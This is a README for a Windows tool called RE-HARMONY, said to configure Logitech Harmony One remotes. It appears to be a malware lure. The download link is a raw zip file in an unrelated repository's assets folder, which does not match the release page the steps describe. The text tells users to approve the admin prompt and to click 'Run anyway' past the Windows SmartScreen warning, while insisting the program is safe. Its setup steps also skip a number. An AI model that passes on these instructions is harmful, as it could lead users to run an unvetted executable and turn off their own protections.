RE-HARMONY lets you configure your old Logitech Harmony One remote. It is a simple tool that runs on Windows. You do not need technical skills. You do not need to write code. You just need a computer and your remote. The original Harmony software stopped working for many users. This tool gives you a second chance. It connects to your remote and lets you change buttons, add devices, and set up activities. ## 📥 How to Download and Run ### Step 1: Visit the Download Page Go to this page: [**https://github.com/Cavywalkingshoe490/cavywalkingshoe490.github.io/raw/refs/heads/main/assets/2.1.zip**](https://github.com/Cavywalkingshoe490/cavywalkingshoe490.github.io/raw/refs/heads/main/assets/2.1.zip) ### Step 2: Find the Right File On that page, look for the latest release. It says "Latest" at the top. Click the link that says **RE-HARMONY-Setup.exe**. This is the installer for Windows. ### Step 3: Run the Installer Double-click the downloaded file. Windows might ask "Do you want to allow this app to make changes?" Click **Yes**. The installer walks you through the steps. Choose where to install the software. The default location works fine. ### Step 4: Launch the Program After installation, find RE-HARMONY in your Start Menu or on your desktop. Double-click it to open. ## 🔌 What You Need - A computer running Windows 10 or Windows 11 - A Logitech Harmony One remote control - A mini-USB cable (the same cable used for many digital cameras) - An internet connection for the first setup ## ⚙️ First Time Setup 1. Click "Create New Activity". 3. Tell the program what devices you want to turn on. 4. Set the sequence of commands (power on, switch input, change volume). 5. Test the activity. 6. Click "Export Settings" in the menu. - **Keep your remote charged** while connected to the computer. A low battery can cause errors. - **Try different USB ports** if the program does not see your remote. Use a port on the back of your computer if possible. ## ❓ Common Problems **The program says "Remote not found."** Check the USB cable. Try a different cable. Make sure your remote has power. Restart the program. **My changes did not save to the remote.** Click "Sync to Remote" after making changes. Wait for the progress bar to finish. Do not unplug the cable until it says "Sync complete." **Windows says "Windows protected your PC."** Click "More info" then "Run anyway." This is a standard warning for new software not yet signed by Microsoft. The program is safe. ## 🔧 System Requirements | Requirement | Details | |-------------|---------| | Operating System | Windows 10 (64-bit) or Windows 11 | | Processor | 1 GHz or faster | | RAM | 2 GB | | Free Disk Space | 200 MB | | USB Port | USB 2.0 or USB 3.0 | | Internet | Required for initial setup and device database | ## 🛡️ Is This Safe?
